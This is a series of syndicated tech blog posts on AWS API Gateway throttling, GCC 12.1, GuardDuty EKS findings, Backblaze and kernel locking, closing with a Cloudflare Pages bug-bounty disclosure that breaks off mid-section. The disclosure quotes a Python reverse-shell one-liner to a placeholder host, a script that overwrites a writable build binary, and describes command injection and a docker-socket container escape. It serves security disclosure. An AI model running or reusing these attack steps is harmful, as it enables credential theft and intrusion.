To get a firm foundation of the basics of throttling and quotas with API Gateway, we’ve provided sample code in AWS-Samples on GitHub. Not only does it provide a starting point to experiment with Usage Plans and API Keys in the API Gateway, but we will modify this code later to address complexity that happens at scale. The sample code has two main parts: 1) a web frontend and, 2) a serverless backend. The backend is a serverless architecture using Amazon API Gateway, AWS Lambda, Amazon DynamoDB, and Amazon Cognito. As Figure I illustrates, it implements one REST API endpoint, GET /api, that is protected with throttling and quotas. There are additional APIs under the /admin/* resource to provide Read access to Usage Plans, and CRUD operations on API Keys.

All these REST endpoints could be tested with developer tools such as curl or Postman, but we’ve also provided a web application, to help you get started. The web application illustrates how tenants might interact with the SaaS application to browse different tiers of service, purchase API Keys, and test them. The web application is implemented in React and uses AWS Amplify CLI and SDKs.

Prerequisites

To deploy the sample code, you should have the following prerequisites:

For clarity, we’ll use the environment variable, ${TOP}, to indicate the top-most directory in the cloned source code or the top directory in the project when browsing through GitHub.

Detailed instructions on how to install the code are in ${TOP}/INSTALL.md file in the code. After installation, follow the ${TOP}/WALKTHROUGH.md for step-by-step instructions to create a test key with a very small quota limit of 10 requests per day, and use the client to hit that limit. Search for HTTP 429: Too Many Requests as the signal your client has been throttled.

Figure 2: The web application (with browser developer tools enabled) shows that a quick succession of API calls starts returning an HTTP 429 after the quota for the day is exceeded.

Figure 2: The web application (with browser developer tools enabled) shows that a quick succession of API calls starts returning an HTTP 429 after the quota for the day is exceeded.

Responsibilities of the Client to support Throttling

The Client must provide an API Key in the header of the HTTP request, labelled, “X-Api-Key:”. If a resource in API Gateway has throttling enabled and that header is missing or invalid in the request, then API Gateway will reject the request.

Important: API Keys are simple identifiers, not authorization tokens or cryptographic keys. API keys are for throttling and managing quotas for tenants only and not suitable as a security mechanism. There are many ways to properly control access to a REST API in API Gateway, and we refer you to the AWS documentation for more details as that topic is beyond the scope of this post.

Clients should always test for the response to any network call, and implement logic specific to an HTTP 429 response. The correct action is almost always “try again later.” Just how much later, and how many times before giving up, is application dependent. Common approaches include:

  • Retry – With simple retry, client retries the request up to defined maximum retry limit configured
  • Exponential backoff – Exponential backoff uses progressively larger wait time between retries for consecutive errors. As the wait time can become very long quickly, maximum delay and a maximum retry limits should be specified.
  • Jitter – Jitter uses a random amount of delay between retry to prevent large bursts by spreading the request rate.

AWS SDK is an example client-responsibility implementation. Each AWS SDK implements automatic retry logic that uses a combination of retry, exponential backoff, jitter, and maximum retry limit.

SaaS Considerations: Tenant Isolation Strategies at Scale

While the sample code is a good start, the design has an implicit assumption that API Gateway will support as many API Keys as we have number of tenants. In fact, API Gateway has a quota on available per region per account. If the sample code’s requirements are to support more than 10,000 tenants (or if tenants are allowed multiple keys), then the sample implementation is not going to scale, and we need to consider more scalable implementation strategies.

This is one instance of a general challenge with SaaS called “tenant isolation strategies.” We highly recommend reviewing this white paper ‘SasS Tenant Isolation Strategies‘. A brief explanation here is that the one-resource-per-customer (or “siloed”) model is just one of many possible strategies to address tenant isolation. While the siloed model may be the easiest to implement and offers strong isolation, it offers no economy of scale, has high management complexity, and will quickly run into limits set by the underlying AWS Services. Other models besides siloed include pooling, and bridged models. Again, we recommend the whitepaper for more details.

Figure 3. Tiered multi-tenant architectures often employ different tenant isolation strategies at different tiers. Our example is specific to API Keys, but the technique generalizes to storage, compute, and other resources.

Figure 3- Tiered multi-tenant architectures often employ different tenant isolation strategies at different tiers. Our example is specific to API Keys, but the technique generalizes to storage, compute, and other resources.

In this example, we implement a range of tenant isolation strategies at different tiers of service. This allows us to protect against “noisy-neighbors” at the highest tier, minimize outlay of limited resources (namely, API-Keys) at the lowest tier, and still provide an effective, bounded “blast radius” of noisy neighbors at the mid-tier.

A concrete development example helps illustrate how this can be implemented. Assume three tiers of service: Free, Basic, and Premium. One could create a single API Key that is a pooled resource among all tenants in the Free Tier. At the other extreme, each Premium customer would get their own unique API Key. They would protect Premium tier tenants from the ‘noisy neighbor’ effect. In the middle, the Basic tenants would be evenly distributed across a set of fixed keys. This is not complete isolation for each tenant, but the impact of any one tenant is contained within “blast radius” defined.

In production, we recommend a more nuanced approach with additional considerations for monitoring and automation to continuously evaluate tiering strategy. We will revisit these topics in greater detail after considering the sample code.

Conclusion

In this post, we have reviewed how to effectively guard a tiered multi-tenant REST API hosted in Amazon API Gateway. We also explored how tiering and throttling strategies can influence tenant isolation models. In Part 2 of this blog series, we will dive deeper into tenant isolation models and gaining insights with metrics.

If you’d like to know more about the topic, the AWS Well-Architected SaaS Lens Performance Efficiency pillar dives deep on tenant tiers and providing differentiated levels of performance to each tier. It also provides best practices and resources to help you design and reduce impact of noisy neighbors your SaaS solution.

To learn more about Serverless SaaS architectures in general, we recommend the AWS Serverless SaaS Workshop and the SaaS Factory Serverless SaaS reference solution that inspired it.

GCC 12.1 Released

Post Syndicated from original https://lwn.net/Articles/894149/

The GCC project has made the first release of the GCC 12 series, GCC 12.1. As the announcement notes, this month is the 35th anniversary of the GCC 1.0 release. There are lots of changes and fixes in this release, including:

This release deprecates support for the STABS debugging format and
introduces support for the CTF debugging format. The C and C++
frontends continue to advance with extending support for features
in the upcoming C2X and C++23 standards and the C++ standard library
improves support for the experimental C++20 and C++23 parts.
The Fortran frontend now fully supports TS 29113 for interoperability with C.

[…] On the security side GCC can now initialize stack variables implicitly
using -ftrivial-auto-var-init to help tracking down and mitigating
uninitialized stack variable flaws. The C and C++ frontends now support
__builtin_dynamic_object_size compatible with the clang extension.
The x86 backend gained mitigations against straight line speculation
with -mharden-sls. The experimental Static Analyzer gained uninitialized
variable use detection and many other improvements.

How to use new Amazon GuardDuty EKS Protection findings

Post Syndicated from Marshall Jones original https://aws.amazon.com/blogs/security/how-to-use-new-amazon-guardduty-eks-protection-findings/

If you run container workloads that use Amazon Elastic Kubernetes Service (Amazon EKS), Amazon GuardDuty now has added support that will help you better protect these workloads from potential threats. Amazon GuardDuty EKS Protection can help detect threats related to user and application activity that is captured in Kubernetes audit logs. Newly-added Kubernetes threat detections include Amazon EKS clusters that are accessed by known malicious actors or from Tor nodes, API operations performed by anonymous users that might indicate a misconfiguration, and misconfigurations that can result in unauthorized access to Amazon EKS clusters. By using machine learning (ML) models, GuardDuty can identify patterns consistent with privilege-escalation techniques, such as a suspicious launch of a container with root-level access to the underlying Amazon Elastic Compute Cloud (Amazon EC2) host. In this post, we give you an overview of the new GuardDuty EKS Protection feature; show you examples of new finding details; and help you understand, operationalize, and respond to these new findings.

Amazon GuardDuty is an automated threat detection service that continuously monitors for suspicious activity and potentially unauthorized behavior to help protect your AWS accounts, Amazon EC2 workloads, data stored in Amazon Simple Storage Service (S3), and now Amazon EKS workloads.

If you are already a GuardDuty customer, you can enable GuardDuty EKS Protection and efficiently navigate the console to begin to use this feature. Your delegated administrator accounts can enable this for existing member accounts and determine if new AWS accounts in an organization will be automatically enrolled. If you are new to GuardDuty, the EKS Protection feature is included as part of the service’s 30-day trial period. As part of the 30-day trial period, you can take full advantage of this new feature and gain insight into your Amazon EKS workloads.

Overview of GuardDuty EKS Protection

GuardDuty EKS Protection enables GuardDuty to detect suspicious activities and potential compromises of your EKS clusters by analyzing Kubernetes audit logs. Kubernetes audit logs provide a security relevant, chronological set of records documenting the sequence of events from individual users, administrators, or system components that have affected your cluster. Audit logs can help answer questions such as: What happened? When did it happen? Who initiated it? GuardDuty EKS Protection analyzes Kubernetes audit logs from your Amazon EKS clusters, both new and existing, without the need to configure EKS control plane logging in your environment. GuardDuty collects these Kubernetes audit logs in addition to AWS CloudTrail, Amazon Virtual Private Cloud (Amazon VPC) flow logs, DNS queries, and Amazon S3 data events. GuardDuty EKS Protection performs analysis and looks for suspicious activity without the need for agents or adding resource constraints to your environment.

To detect threats using Kubernetes audit logs, GuardDuty uses a combination of machine learning, anomaly detection, and integrated threat intelligence to identify and prioritize potential threats. These findings primarily align to five root causes including compromised container images, configuration issues, Kubernetes user compromise, pod compromise, and node compromise. An example of a configuration issue is granting unnecessary privileges to the anonymous user by misconfiguring role-based access control (RBAC), which may inadvertently allow anonymous and unauthenticated calls to the Kubernetes API. A Kubernetes user compromise example could be a bad actor using stolen credentials to deploy containers with insecure settings, to use for a variety of activities from command and control to crypto-mining.

After a threat is detected, GuardDuty generates a security finding that includes container details such as the pod ID, container image ID, and tags associated with the Amazon EKS cluster. These finding details assist you with understanding the root cause which you can use to identify basic steps to remediate findings specific to EKS clusters. For example, your response to a finding or group of findings associated with a compromised Kubernetes user might begin with revoking access. For more information, see Remediating Kubernetes security issues discovered by GuardDuty in the Amazon GuardDuty User Guide.

Understanding new GuardDuty EKS Protection findings

As adversaries continue to become more sophisticated, it becomes even more important for you to align to a common framework to understand the tactics, techniques, and procedures (TTPs) behind an individual event. GuardDuty aligns findings using the MITRE ATT&CK framework, which is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. GuardDuty findings have a specific finding format that helps you understand details of each finding. If you examine the ThreatPurpose portion in the GuardDuty EKS Protection finding types, you see there are finding types associated with various MITRE ATT&CK tactics, including CredentialAccess, DefenseEvasion, Discovery, Impact, Persistence, and PrivilegeEscalation. This can help you identify and understand the type of activity associated with a finding.

For example, look at two different finding types that seem similar: Impact:Kubernetes/SuccessfulAnonymousAccess and Discovery:Kubernetes/SuccessfulAnonymousAccess. You can see the difference is the ThreatPurpose at the beginning. They are both involved with successful anonymous access, and the difference is the intent of the activity associated with each finding. GuardDuty has determined based on the API or request URI invoked, that in this example, the activity seen on one finding aligns with the Impact tactic whereas the other finding aligns with the Discovery tactic

With GuardDuty EKS Protection, you now have an additional mechanism to gain insight into your EKS clusters across your accounts to look for suspicious activity. You can be alerted to Kubernetes-specific suspicious activity including: allowing administrator access to the default service account, exposing a Kubernetes dashboard, and launching a container with sensitive host paths. With this new feature, GuardDuty is also able to extend support for finding types that you might already be familiar with that also apply to Amazon EKS workloads. These finding types include calls to a Kubernetes cluster API from a Tor node, or calls to a Kubernetes cluster from a known malicious IP address, which can indicate that there are interactions with your Kubernetes clusters from sources that are commonly associated with malicious actors.

Responding to GuardDuty EKS Protection findings

This section gives an overview of three new GuardDuty EKS Protection findings, how to prevent them, and how to investigate and respond if they happen in your environment. The patterns shown can also act as a guide for how to prevent, investigate, and respond to other GuardDuty EKS Protection findings.

Discovery:Kubernetes/SuccessfulAnonymousAccess

Finding documentation: Discovery:Kubernetes/SuccessfulAnonymousAccess

Severity: Medium

Overview: This finding (as shown in Figure 1) informs you that an API operation was successfully invoked by the system:anonymous user. API calls made by system:anonymous are unauthenticated. The observed API is commonly associated with the discovery stage of an attack when an adversary is gathering information on your Kubernetes cluster. This activity indicates that anonymous or unauthenticated access is permitted on the API action reported in the finding, and may be permitted on other actions. These API calls are possible because of a misconfiguration of the system:anonymous user or system:unauthenticated group.

Preventative measures: AWS recommends that you disable unnecessary anonymous authentication. For instructions, see Review and revoke unnecessary anonymous access in the Amazon EKS Best Practices Guides. It is important to note that Kubernetes versions older than 1.14 granted system:discovery and system:basic-user roles to system:anonymous user by default, and these permissions remain in place after updating unless you explicitly change them.

How to remediate: To respond to this finding, it is important to first identify the details of the activity, for example what cluster is involved? Who is the owner of this cluster? This information will assist you with the remediation steps that follow, to review and revoke unnecessary permissions, and also help you determine a root cause.
 

Figure 1: GuardDuty Console showing Discovery:Kubernetes/SuccessfulAnonymousAccess finding type

Figure 1: GuardDuty Console showing Discovery:Kubernetes/SuccessfulAnonymousAccess finding type

Remediation step 1: Examine permissions

The first step is to examine the permissions that have been granted to the system:anonymous user, and determine what permissions are needed. To accomplish this, you need to first understand what permissions the system:anonymous user has. You can use an rbac-lookup tool to list the Kubernetes roles and cluster roles bound to users, service accounts, and groups. An alternative method can be found at this GitHub page.

./rbac-lookup | grep -P 'system:(anonymous)|(unauthenticated)'
system:anonymous               cluster-wide        ClusterRole/system:discovery
system:unauthenticated         cluster-wide        ClusterRole/system:discovery
system:unauthenticated         cluster-wide        ClusterRole/system:public-info-viewer

Remediation step 2: Disassociate groups

Next, you disassociate the system:unauthenticated group from system:discovery and system:basic-user ClusterRoles, which you do by editing the ClusterRoleBinding. Make sure to not remove system:unauthenticated from the system:public-info-viewer cluster role binding, because that will prevent the Network Load Balancer from performing health checks against the API server. For more information, see Network Load Balancer in the AWS Load Balancer Controller Guide and Identity and Access Management in Amazon EKS Best Practices Guide.

To disassociate the appropriate groups

  1. Run the command kubectl edit clusterrolebindings system:discovery. This command will open the current definition of system:discovery ClusterRoleBinding in your editor as shown in the sample .yaml configuration file:
    # Please edit the object below. Lines beginning with a '#' will be ignored,
    # and an empty file will abort the edit. If an error occurs while saving this # file will be reopened with the relevant failures.
    #
    apiVersion: rbac.authorization.k8s.io/v1
    kind: ClusterRoleBinding
    metadata:
      annotations:
        rbac.authorization.kubernetes.io/autoupdate: "true"
      creationTimestamp: "2021-06-17T20:50:49Z"
      labels:
        kubernetes.io/bootstrapping: rbac-defaults
      name: system:discovery
      resourceVersion: "24502985"
      selfLink: /apis/rbac.authorization.k8s.io/v1/clusterrolebindings/system%3Adiscovery
      uid: b7936268-5043-431a-a0e1-171a423abeb6
    roleRef:
      apiGroup: rbac.authorization.k8s.io
      kind: ClusterRole
      name: system:discovery
    subjects:
    - apiGroup: rbac.authorization.k8s.io
      kind: Group
      name: system:authenticated
    - apiGroup: rbac.authorization.k8s.io
      kind: Group
      name: system:unauthenticated
    

  2. Delete the entry for system:unauthenticated group, which is highlighted in bold in the subjects section.
  3. Repeat the same steps for system:basic-user ClusterRoleBinding.

If there is no reason that the system:anonymous user should be used in your environment, AWS recommends that you set up automatic response and remediation steps 1-3. For more information about the system:anonymous user, see Identity and Access Management in Amazon EKS Best Practices Guide.

PrivilegeEscalation:Kubernetes/PrivilegedContainer

Finding documentation: PrivilegeEscalation:Kubernetes/PrivilegedContainer

Severity: Medium

Overview: This finding (as shown in Figure 2) informs you that a privileged container was launched on your Kubernetes cluster using an image that has never before been used to launch privileged containers in your cluster. A privileged container has root level access on the host. Adversaries commonly launch privileged containers to perform privilege escalation to gain access and compromise the underlying host.

Preventative measures: Create and enforce policy-as-code (PAC) or Pod Security Standards (PSS) that require that pods be created as non-privileged. For more information, see Pod Security in the in Amazon EKS Best Practices Guide.

How to remediate: To respond to this finding, it is important to first identify the details of the activity and begin to answer questions that will help determine what happened. For example, what pod or workload was launched? Who was the user that launched this pod or workload? What cluster is involved?
 

Figure 2: GuardDuty Console showing PrivilegeEscalation:Kubernetes/PrivilegedContainer finding type

Figure 2: GuardDuty Console showing PrivilegeEscalation:Kubernetes/PrivilegedContainer finding type

If this privileged container launch is unexpected, the credentials of the user identity used to launch the container may be compromised. You should then focus on remediating and reviewing access to your cluster, and remediating the user. To do this, follow the procedure in the Remediating a compromised Kubernetes user section of this post. Next, you should identify compromised pods using the procedure in the Identifying and remediating compromised pods section of this post.

If you know what specific circumstances a privileged container can be deployed in your environment, for example only in a specific namespace, it is likely you can automatically remediate any GuardDuty EKS Protection finding associated with a privileged container in any other namespace. For more information about automated response activities, see Incident response and forensics in the Amazon EKS Best Practices Guide.

Persistence:Kubernetes/ContainerWithSensitiveMount

Finding documentation: Persistence:Kubernetes/ContainerWithSensitiveMount

Severity: Medium

Overview: This finding (as shown in Figure 3) informs you that a container was launched with a configuration that included a sensitive host path with write access in the volumeMounts section. This makes the sensitive host path accessible and writable from inside the container. This technique is commonly used by adversaries to gain access to the host’s filesystem.

Preventative Measures: Create and enforce policy-as-code (PAC) or Pod Security Standards (PSS) that use the allowedHostPaths control to only allow required host paths for use in volumes and preferably with read-only access. For more information, see Pod Security in the Amazon EKS Best Practices Guide.

How to remediate: To respond to this finding, it is important to first identify the details of the activity and begin to answer questions that will help determine what happened. For example, what pod or workload was launched? Who was the user that launched this pod or workload? What cluster is involved?
 

Figure 3: GuardDuty Console showing Persistence:Kubernetes/ContainerWithSensitiveMount finding type

Figure 3: GuardDuty Console showing Persistence:Kubernetes/ContainerWithSensitiveMount finding type

If the container launched is unexpected, the credentials of the user identity used to launch the container may be compromised. You should then focus on remediating and reviewing access to your cluster and remediating the user. To do this, follow the procedure in the next section, Remediating a compromised Kubernetes user.

If you can determine what containers should and should not be launched with writable hostPath mounts, then you can create automatic response and remediation for this use case. For example, you might want to revoke temporary security credentials assigned to the pod or worker node. For more information about revoking temporary security credentials and other response and remediation actions, see Incident response and forensics in the Amazon EKS Best Practices Guide.

Remediating a compromised Kubernetes user

If the compromised user has privileges to read secrets of one or more namespaces, rotate all of the affected secrets. For more information about the different types of secrets, see Secrets in the Kubernetes documentation. If the user has write privileges, AWS recommends auditing all changes made by the user in question. You can accomplish this by querying audit logs, if you have enabled EKS control plane logging on your EKS cluster. If you do not currently have logging enabled, follow the instructions for Enabling and disabling control plane logs in the Amazon EKS User Guide. Amazon EKS stores these control plane logs in Amazon CloudWatch Logs in your account. You can use CloudWatch Logs Insights to list all the mutating changes that the compromised user has made.

Remediation step 1: Identify the user

All actions performed on a Kubernetes cluster has an associated identity. GuardDuty EKS Protection findings report details of the Kubernetes user identity that the malicious actor may have compromised. You can find details of the user identity in the GuardDuty console under the Kubernetes user details section in the finding details, or in the finding JSON under the resources.eksClusterDetails.kubernetesDetails.kubernetesUserDetails section. These user details include username, UID, and groups that the user belongs to.

Remediation step 2: Identify changes

  1. Identify the changes made by the attacker associated with the compromised user identity by using the code example below to query CloudWatch Logs Insights, replacing the placeholders with your values.
    fields @timestamp, @message
    | filter user.username == <username> 
    | filter verb == "create" or verb == "update" or verb == "patch"
    | filter responseStatus.code >= 200 and responseStatus.code <= 300
    | filter @timestamp >= <approximate start time of the attack in epoch milliseconds>

    For example:

    fields @timestamp, @message
    | filter user.username == "kubernetes-admin" 
    | filter verb == "create" or verb == "update" or verb == "patch"
    | filter responseStatus.code >= 200 and responseStatus.code <= 300
    | filter @timestamp >= 1628279482312
    

  2. An EKS cluster can have multiple types of user identities, for example the kubernetes-admin user, aws-auth ConfigMap defined user, and so on. You will need to take actions appropriate for the user type to properly revoke its access. For more information, see Remediating compromised Kubernetes users in the Amazon GuardDuty User Guide.
  3. (Optional) If the compromised user identity had extensive privileges and you determine that the attacker made extensive changes to the cluster, you should consider isolating the pod, followed by creating a new clean cluster and redeploying your applications to the new cluster. For instructions to isolate and redeploy EKS pods, see Isolate the Pod by creating a Network Policy that denies all ingress and egress traffic to the pod in the Amazon EKS Best Practices Guide.

Identifying and remediating compromised pods

If a GuardDuty EKS Protection finding is caused by activity related to a specific pod, the value of the finding JSON resource.kubernetesDetails.kubernetesWorkloadDetails.type field is pod. The finding includes the name of the pod and namespace in the resource.kubernetesDetails.kubernetesWorkloadDetails.name and resource.kubernetesDetails.kubernetesWorkloadDetails.namespace fields, which uniquely identify the pod.

In other cases, such as when a service account or a Kubernetes workload name is in the resource.kubernetesDetails.kubernetesUserDetails, you can follow the instructions in the Sample incident response plan to identify compromised pods using different pieces of information available in the GuardDuty EKS Protection findings.

After you have identified compromised pods, to remediate, use the instructions to isolate the pods, rotate the credentials, and gather data for forensic analysis in Isolate the Pod by creating a Network Policy that denies all ingress and egress traffic to the pod in the Amazon EKS Best Practices Guide.

Conclusion

In this post, you learned the details of the new Amazon GuardDuty EKS Protection feature, and Kubernetes audit logs, and you saw examples for how to understand, operationalize, and respond to these new findings. You can enable this feature through the GuardDuty Console or APIs to start monitoring your Amazon EKS clusters today. If you have created Amazon EventBridge Rules to send findings from GuardDuty to a target, then ensure that your rules are configured to deliver these newly added findings.

AWS is committed to continually improving GuardDuty, to make it more efficient for you to operate securely in AWS. At AWS, customer feedback drives change, so we encourage you to continue providing feedback. If you have feedback about this post, submit comments in the Comments section below. If you have questions about this post, start a new thread on AWS re:Post or contact AWS Support.

Want more AWS Security how-to content, news, and feature announcements? Follow us on Twitter.

Author

Marshall Jones

Marshall is a worldwide security specialist solutions architect at AWS. His background is in AWS consulting and security architecture, focused on a variety of security domains including edge, threat detection, and compliance. Today, he helps enterprise customers adopt and operationalize AWS security services to increase security effectiveness and reduce risk.

Developers: Spring Into Action With Backblaze B2 Cloud Storage

Post Syndicated from original https://www.backblaze.com/blog/developers-spring-into-action-with-backblaze-b2-cloud-storage/

Spring is in the air here in the Northern Hemisphere, and a developer’s fancy lightly turns to new projects. Whether you’ve already discovered how astonishingly easy it is to work with Backblaze B2 Cloud Storage or not, we hope you find this collection of handy tips, tricks, and resources useful—many of the techniques apply no matter where you are storing data. But first, let’s have a little fun…

Backblaze Developer Meetup

Whether you call yourself a developer, software engineer, or programmer, if you are a Backblaze B2 customer or are just Backblaze B2-curious and want to hang out in person with like-minded folks, here’s your chance. Backblaze is hosting its very first developer meetup on May 24th from 6–8 p.m. in downtown San Mateo, California. We’ll be joined by Gleb Budman, CEO and Co-founder of Backblaze, members of our Engineering team, our Developer Evangelism team, sales engineers, product managers, and more. There’ll be snacks, drinks, prizes, and more. Space is limited, so please sign up for a spot using this Google Form by May 13th and we’ll let you know if there’s space.

Join Us at GlueCon 2022

Are you going to GlueCon 2022? Backblaze will be there! GlueCon is a developer-centric event that will be held in Broomfield, Colorado on May 18th and 19th, 2022. Backblaze is the partner sponsor of the event and Pat Patterson, our chief technical evangelist, will deliver one of the keynotes. There’s still time to learn more and sign up for GlueCon 2022, but act now!

Tips and Tricks

Here’s a collection of tips and tricks we’ve published over the last few months. You can take them as written or use your imagination as to what other problems you can solve.

  • Media Transcoding With Backblaze B2 and Vultr Cloud Compute
    Your task is simple: allow users to upload video from their mobile or desktop device and then make that video available to a wide variety of devices anywhere in the world. We walk you through how we built a very simple video sharing site with Backblaze B2 and Vultr’s Infrastructure Cloud using Vultr’s Cloud Compute instances for the application servers and their new Optimized Cloud Compute instances for the transcoding workers. This includes setup instructions for Vultr and sample code in GitHub.
  • Free Image Hosting With Cloudflare and Backblaze B2
    Discover how the combination of Cloudflare and Backblaze B2 allows you to create your own, personal 10GB image hosting site for free. You start out using Cloudflare Transform Rules to give you access to HTTP traffic at the CDN edge server. This allows you to manipulate the URI path, query string, and HTTP headers of incoming requests and outgoing responses. We provide step-by-step instructions on how to setup both Cloudflare and Backblaze B2 and leave the rest up to you.
  • Building a Multiregion Origin Store With Backblaze B2 and Fastly Compute@Edge
    Compute@Edge is a serverless computing environment built on the same caching platform as the Fastly Deliver@Edge CDN. Serverless computing removes provisioning, configuration, maintenance, and scaling from the equation. One place where this technology can be used is in serving your own data from multiple Backblaze B2 regions—in other words, serve it from the closest or most available location. Learn how to create a Compute@Edge application and connect it to Backblaze B2 buckets making your data available anywhere.
  • Using a Cloudflare Worker to Send Notifications on Backblaze B2 Events
    When building an application, a common requirement is to be able to send a notification of an event (e.g., a user uploading a file) so that an application can take some action (e.g., processing the file). Learn how you can use a Cloudflare Worker to send event notifications to a wide range of recipients, allowing great flexibility when building integrations with Backblaze B2.

Additional Resources

What’s Next?

Coming soon on our blog, we’ll provide a developer quick start kit using Python that you can use with the Backblaze S3 Compatible API to store and access data in B2 Cloud Storage. The quick start kit includes:

  1. A sample application with open-source code on GitHub.
  2. Video code walk-throughs of the sample application.
  3. Hosted sample data.
  4. Guided instructions that walk you through downloading the sample code, running it yourself, and then using the code as you see fit, including incorporating it into your own applications.

Launching in mid-May; stay tuned!

Wrap-up

Hopefully you’ve found a couple of things you can try out using Backblaze B2 Cloud Storage. Join the many developers around the world who have discovered how easy it can be to work with Backblaze B2. If you have any questions, you can visit www.backblaze.com/help.html to use our Knowledge Base, chat with our customer support, or submit a customer support request. Of course, you’ll find lots of other developers online who are more than willing to help as well. Good luck and invent something awesome.

The post Developers: Spring Into Action With Backblaze B2 Cloud Storage appeared first on Backblaze Blog | Cloud Storage & Cloud Backup.

[$] The ongoing search for mmap_lock scalability

Post Syndicated from original https://lwn.net/Articles/893906/

There are certain themes that recur regularly at the Linux Storage,
Filesystem, Memory-Management, and BPF Summit; among the most reliable is
the scalability problems posed by the mmap_lock (formerly
mmap_sem) lock. This topic has come up in (at least)
2013,
2018 (twice),
and 2019. The 2022 event was no
exception, with three consecutive sessions led by Liam Howlett, Michel
Lespinasse, and Suren Baghdasaryan
dedicated to the topic. There improvements on the horizon, but the problem
is far from solved.

The Cloudflare Bug Bounty program and Cloudflare Pages

Post Syndicated from Evan Johnson original https://blog.cloudflare.com/pages-bug-bounty/

The Cloudflare Bug Bounty program and Cloudflare Pages

The Cloudflare Bug Bounty program and Cloudflare Pages

The Cloudflare Pages team recently collaborated closely with security researchers at Assetnote through our Public Bug Bounty. Throughout the process we found and have fully patched vulnerabilities discovered in Cloudflare Pages. You can read their detailed write-up here. There is no outstanding risk to Pages customers. In this post we share information about the research that could help others make their infrastructure more secure, and also highlight our bug bounty program that helps to make our product more secure.

Cloudflare cares deeply about security and protecting our users and customers — in fact, it’s a big part of the reason we’re here. But how does this manifest in terms of how we run our business? There are a number of ways. One very important prong of this is our bug bounty program that facilitates and rewards security researchers for their collaboration with us.

But we don’t just fix the security issues we learn about — in order to build trust with our customers and the community more broadly, we are transparent about incidents and bugs that we find.

Recently, we worked with a group of researchers on improving the security of Cloudflare Pages. This collaboration resulted in several security vulnerability discoveries that we quickly fixed. We have no evidence that malicious actors took advantage of the vulnerabilities found. Regardless, we notified the limited number of customers that might have been exposed.

In this post we are publicly sharing what we learned, and the steps we took to remediate what was identified. We are thankful for the collaboration with the researchers, and encourage others to use the bounty program to work with us to help us make our services — and by extension the Internet — more secure!

What happens when a vulnerability is reported?

Once a vulnerability has been reported via HackerOne, it flows into our vulnerability management process:

  1. We investigate the issue to understand the criticality of the report.
  2. We work with the engineering teams to scope, implement, and validate a fix to the problem. For urgent problems we start working with engineering immediately, and less urgent issues we track and prioritize alongside engineering’s normal bug fixing cadences.
  3. Our Detection and Response team investigates high severity issues to see whether the issue was exploited previously.

This process is flexible enough that we can prioritize important fixes same-day, but we never lose track of lower criticality issues.

What was discovered in Cloudflare Pages?

The Pages team had to solve a pretty difficult problem for Cloudflare Builds (our CI/CD build pipeline): how can we run untrusted code safely in a multi-tenant environment? Like all complex engineering problems, getting this right has been an iterative process. In all cases, we were able to quickly and definitively address bugs reported by security researchers. However, as we continued to work through reports by the researchers, it became clear that our initial build architecture decisions provided too large an attack surface. The Pages team pivoted entirely and re-architected our platform in order to use gVisor and further isolate builds.

When determining impact, it is not enough to find no evidence that a bug was exploited, we must conclusively prove that it was not exploited. For almost all the bugs reported, we found definitive signals in audit logs and were able to correlate that data exclusively against activity by trusted security researchers.

However, for one bug, while we found no evidence that the bug was exploited beyond the work of security researchers, we were not able meaningfully prove that it was not. In the spirit of full transparency, we notified all Pages users that may have been impacted.

Now that all the issues have been remedied, and individual customers have been notified, we’d like to share more information about the issues.

Bug 1: Command injection in CLONE_REPO

With a flaw in our logic during build initialization, it was possible to execute arbitrary code, echo environment variables to a file and then read the contents of that file.

The Cloudflare Bug Bounty program and Cloudflare Pages

The crux of the bug was that root_dir in this line of code was attacker controlled. After gaining control the researcher was able to specially craft a malicious root_dir to dump the environment variables of the process to a file. Those environment variables contained our GitHub bot’s authorization key. This would have allowed the attacker to read the repositories of other Pages’ customers, and many of those repositories are private.

The Cloudflare Bug Bounty program and Cloudflare Pages

After fixing the input validation for this field to prevent the bug, and rolling the disclosed keys, we investigated all other paths that had ever been set by our Pages customers to see if this attack had ever been performed by any other (potentially malicious) security researchers. We had logs showing that this was the first this particular attack had ever been performed, and responsibly reported.

Bug 2: Command injection in PUBLISH_ASSETS

This bug is nearly identical to the first one, but on the publishing step instead of the clone step. We went to work rotating the secrets that were exposed, fixing the input validation issues, and rotating the exposed secrets. We investigated the Cloudflare audit logs to confirm that the sensitive credentials had not been used by anyone other than our build infrastructure, and within the scope of the security research being performed.

Bug 3: Cloudflare API key disclosure in the asset publishing process

While building customer pages, a program called /opt/pages/bin/pages-metadata-generator is involved. This program had the Linux permissions of 777, allowing all users on the machine to read the program, execute the program, but most importantly overwrite the program. If you can overwrite the program prior to its invocation, the program might run with higher permissions when the next user comes along and wants to use it.

In this case the attack is simple. When a Pages build runs, the following build.sh is specified to run, and it can overwrite the executable with a new one.

#!/bin/bash
cp pages-metadata-generator /opt/pages/bin/pages-metadata-generator

This allows the attacker to provide their own pages-metadata-generator program that is run with a populated set of environment variables. The proof of concept provided to Cloudflare was this minimal reverse shell.

#!/bin/bash
echo "henlo fren"
export > /tmp/envvars
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("x.x.x.x.x",9448));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

With a reverse shell, the attackers only need to run `env` to see a list of environment variables that the program was invoked with. We fixed the file permissions of the process, rotated the credentials, and investigated in Cloudflare audit logs to confirm that the sensitive credentials had not been used by anyone other than our build infrastructure, and within the scope of the security research.

Bug 4: Bash path injection

This issue was very similar to Bug 3. The PATH environment variable contained a large set of directories for maximum compatibility with different developer tools.

PATH=/opt/buildhome/.swiftenv/bin:/opt/buildhome/.swiftenv/shims:/opt/buildhome/.php:/opt/buildhome/.binrc/bin:/usr/local/rvm/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/buildhome/.cask/bin:/opt/buildhome/.gimme/bin:/opt/buildhome/.dotnet/tools:/opt/buildhome/.dotnet

Unfortunately not all of these directories were set to the proper filesystem permissions allowing a malicious version of the program bash to be written to them, and later invoked by the Pages build process. We patched this bug, rotated the impacted credentials, and investigated in Cloudflare audit logs to confirm that the sensitive credentials had not been used by anyone other than our build infrastructure, and within the scope of the security research.

Bug 5: Azure pipelines escape

Back when this research was conducted we were running Cloudflare Pages on Azure Pipelines. Builds were taking place in highly privileged containers and the containers had the docker socket available to them. Once the researchers had root within these containers, escaping them was trivial after installing docker and mounting the root directory of the host machine.

